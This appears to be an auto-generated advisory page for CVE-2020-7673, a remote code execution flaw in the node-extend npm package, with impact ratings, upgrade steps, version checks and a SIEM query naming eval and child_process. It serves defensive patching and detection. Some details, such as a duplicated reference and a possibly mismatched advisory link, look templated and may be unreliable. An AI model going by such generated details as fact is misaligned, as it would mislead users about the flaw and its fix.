CVE-2020-7673 – CVE-2020-7673 allows remote code execution thro... (How to Fix)

Q: What is the severity of CVE-2020-7673?

CVE-2020-7673 has a CVSS score of 9.8 (CRITICAL). CVE-2020-7673 allows remote code execution through the node-extend library when untrusted user input reaches the vulnerable extend function. This affects any Node.js application using node-extend versions through 0.2.0 that processes external input. Attackers can execute arbitrary code on affected systems.

📋 TL;DR

CVE-2020-7673 allows remote code execution through the node-extend library when untrusted user input reaches the vulnerable extend function. This affects any Node.js application using node-extend versions through 0.2.0 that processes external input. Attackers can execute arbitrary code on affected systems.

💻 Affected Systems

Products:

node-extend

Versions: All versions through 0.2.0

Operating Systems: All platforms running Node.js

Default Config Vulnerable: ⚠️ Yes

Notes: Only vulnerable when untrusted user input reaches the extend function with specific parameters.

📦 What is this software?

Node Extend by Node Extend Project

View all CVEs affecting Node Extend →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attackers to execute arbitrary commands, steal data, install malware, or pivot to other systems.

🟠

Likely Case

Remote code execution leading to application compromise, data exfiltration, or service disruption.

🟢

If Mitigated

Limited impact if input validation prevents untrusted data from reaching the vulnerable function.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires attacker-controlled input to reach the vulnerable function with specific parameters.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.2.1 and later

Vendor Advisory: https://github.com/justmoon/node-extend/security/advisories/GHSA-8c6p-g9qj-8ppj

Restart Required: Yes

Instructions:

1. Update package.json to require node-extend version 0.2.1 or later. 2. Run 'npm update node-extend' or 'yarn upgrade node-extend'. 3. Restart your Node.js application.

🔧 Temporary Workarounds

Input validation and sanitization

all

Implement strict input validation to prevent untrusted data from reaching the extend function.

Package lock to safe version

all

Force package manager to use patched version by updating package-lock.json or yarn.lock.

npm install node-extend@0.2.1
yarn add node-extend@0.2.1

🧯 If You Can't Patch

Implement strict input validation and sanitization for all user inputs
Use network segmentation to isolate vulnerable systems and limit blast radius

🔍 How to Verify

Check if Vulnerable:

Check package.json or run 'npm list node-extend' to see if version is 0.2.0 or earlier.

Check Version:

npm list node-extend | grep node-extend

Verify Fix Applied:

Verify installed version is 0.2.1 or later using 'npm list node-extend'.

📡 Detection & Monitoring

Log Indicators:

Unusual process spawns from Node.js application
Suspicious eval() function calls in application logs

Network Indicators:

Unexpected outbound connections from Node.js application
Command and control traffic patterns

SIEM Query:

process.name:node AND (process.cmdline:*eval* OR process.cmdline:*child_process*)

📊 Metadata

CVE ID: CVE-2020-7673

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-94

Published: June 10, 2020

Last Updated: November 21, 2024

🔗 References

https://snyk.io/vuln/SNYK-JS-NODEEXTEND-571491 Exploit,Third Party Advisory
https://snyk.io/vuln/SNYK-JS-NODEEXTEND-571491 Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-7673, you might also want to check these: